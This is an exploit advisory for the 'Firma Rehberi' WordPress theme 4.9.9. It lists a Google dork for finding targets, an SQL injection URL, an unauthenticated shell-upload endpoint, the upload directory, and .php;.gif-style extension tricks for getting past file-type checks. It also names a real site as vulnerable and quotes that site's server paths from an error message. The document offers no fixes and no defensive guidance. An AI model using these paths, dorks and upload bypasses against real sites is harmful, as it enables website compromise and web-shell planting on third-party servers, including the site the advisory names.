################################################################################################# # Exploit Title : WordPress Firma Rehberi Themes 4.9.9 SQL Injection and Remote Shell Upload Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 22/12/2018 # Vendor Homepage : wordpress.org ~ temafabrika.com/demo/rehber3/ # Software Download Link : temafabrika.com/wordpress-responsive-firma-rehberi-3-temasi.html # Software Price : 150 TL # Tested On : Windows and Linux # Category : WebApps # Version Information : V4.9.9 ~ PHP 5.6.30 ~ jQuery 1.12.2 # Exploit Risk : Medium # Google Dorks : inurl:''/wp-content/themes/rehber/js/'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] CWE-264 - [ Permissions, Privileges, and Access Controls ] - + CWE-434- [ Unrestricted Upload of File with Dangerous Type ] ################################################################################################# # Admin Panel Login Path : /wp-login.php # SQL Injection Exploit : /wp-content/themes/rehber/index.php?id=1%27 # Arbitrary File Upload/Shell Upload Exploit : /wp-content/themes/rehber/js/upload.php # Directory File Path : /fresim/resim[RANDOMNUMBERS][YOURFILENAMEHERE].php;.gif # Note : .php;.gif ~ .asp;.png ~ .shtml.fla;.jpeg ################################################################################################# # Example Vulnerable Site => [+] bagcilarfirmarehberi.com/wp-content/themes/rehber/js/upload.php ################################################################################################# # SQL Database Error : Fatal error: Call to undefined function get_header() in /home/bagcilarfirma/public_html/wp-content/themes/rehber/index.php on line 1 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################